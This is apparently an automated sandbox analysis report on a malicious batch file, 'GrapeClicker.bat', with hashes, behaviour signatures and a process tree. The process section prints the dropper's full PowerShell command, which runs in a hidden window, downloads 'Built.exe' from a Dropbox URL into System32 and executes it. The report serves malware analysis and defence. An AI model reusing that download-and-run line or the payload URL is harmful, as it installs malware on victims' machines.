Analysis
-
max time kernel
93s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09/07/2024, 14:45
Static task
static1
Behavioral task
behavioral1
Sample
GrapeClicker.bat
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
GrapeClicker.bat
Resource
win10v2004-20240704-en
General
-
Target
GrapeClicker.bat
-
Size
257KB
-
MD5
943510c42aa0f927709ce02060159930
-
SHA1
4ab7f9e751e5e0d570377866b333e2fd5f35502e
-
SHA256
238dd9a07c6e18a8419779ba4708fd69f6fcde59afcc4a4d01037892a08421c2
-
SHA512
a47947161f35ec9e873afd5550bf6b40e06cf248be7469a840ff41b784d73a4175c6d7e72cd9411a3bad6a9a4ee35cd808a3672faf9ea044c11de47f55c9b299
-
SSDEEP
1536:2qv13AXxv+yPGCghLv13AXxv+yPGCghLv13AXxv+yPGCghLv13AXxv+yPGCghLvB:2GyKHyKHyKHyKHyKxyKHyKHyKHyKHyKh
Malware Config
Extracted
https://www.dropbox.com/scl/fi/z2tfa0dnzj2tls42d874i/Built.exe?rlkey=8l8kvc3bqw2l30ghh4hopc1wj&st=qbvy10qj&dl=1
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 3636 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3636 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\Built.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3636 powershell.exe 3636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3636 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2012 wrote to memory of 2152 2012 cmd.exe 85 PID 2012 wrote to memory of 2152 2012 cmd.exe 85 PID 2012 wrote to memory of 3636 2012 cmd.exe 86 PID 2012 wrote to memory of 3636 2012 cmd.exe 86
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\GrapeClicker.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:2152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/z2tfa0dnzj2tls42d874i/Built.exe?rlkey=8l8kvc3bqw2l30ghh4hopc1wj&st=qbvy10qj&dl=1', 'C:\Windows\System32\Built.exe'); Start-Process 'C:\Windows\System32\Built.exe'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3636
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
157KB
MD5c6c2097eb94ac8830ba7cc4ade737e4e
SHA1b1ff56bdc3440b39e4c11e78a3247edc587ff58e
SHA256445a34fdcfa783463e7a8633be124c3fc0adf7439efe5d069ea5c1cdb03fc061
SHA512aede03221c58fa4786baabcf2a76cb1e630b31e70aae4e573c303540f0af19060808286ecbefa7d1069e068c92d1d2496f24bf338e6a3a31217660d54435aa70